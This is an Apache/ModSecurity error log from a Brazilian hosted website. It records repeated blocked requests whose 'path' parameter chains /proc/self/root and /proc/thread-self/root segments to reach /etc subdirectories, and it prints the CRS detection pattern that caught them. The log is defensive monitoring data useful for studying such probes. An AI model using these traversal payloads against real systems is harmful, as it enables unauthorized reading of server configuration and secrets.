[Thu Mar 19 04:06:09.871720 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.241.31:54180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugYV_V7PWP6ixUYl6EeQAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:06:11.157270 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:52998] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugY8df6f5d65gmYZQ7mwAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:06:12.471006 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.241.31:53014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugZPu8EFLIOrSqIptmMgAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:06:13.738255 2026] [:error] [pid 19093:tid 140411565680384] [client 74.7.241.31:53028] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugZV_V7PWP6ixUYl6EhgAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:06:15.784560 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:58704] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugZ1_V7PWP6ixUYl6EigAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:06:19.157613 2026] [mime_magic:error] [pid 17887:tid 140411616036608] (70014)End of file found: [client 74.7.243.128:42828] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc
[Thu Mar 19 04:06:19.843617 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.241.31:53038] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuga_-YZRR_7pZ7nDJVvgAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:06:24.249914 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:43756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugcNa6ubjKNq_cu4YIDQAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:06:27.819630 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.241.31:43764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugc_-YZRR_7pZ7nDJVyAAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:06:31.032432 2026] [:error] [pid 19093:tid 140411548894976] [client 74.7.241.31:35640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugd1_V7PWP6ixUYl6EkQAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:06:32.252059 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:45290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugeNa6ubjKNq_cu4YIEwAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:06:32.359069 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:35650] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugeNa6ubjKNq_cu4YIFAAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:06:33.703078 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:35662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugeda6ubjKNq_cu4YIFgAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:06:49.599783 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.241.31:35674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugiRkFeYa1D6dYQnC14gAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:06:50.939113 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:53368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugiuoXxyEfFpUF8f_ZugAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:06:57.186646 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.241.31:53370] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugkfu8EFLIOrSqIptmTQAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:06:59.626767 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:54564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugk_u8EFLIOrSqIptmTwAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:07:00.007355 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.244.43:36618] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuglOyqAr6etmhZHNoskgAAAEE"]
[Thu Mar 19 04:07:03.991107 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:54566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugl9a6ubjKNq_cu4YIMQAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:07:06.350959 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:54568] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugmgkwaGbbGflqUZB89wAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:07:08.464853 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:59954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugm-oXxyEfFpUF8f_ZwAAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:07:11.967361 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:59962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugn-yqAr6etmhZHNosmAAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:07:15.044973 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:59978] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugo-yqAr6etmhZHNosnwAAAEM"], referer: 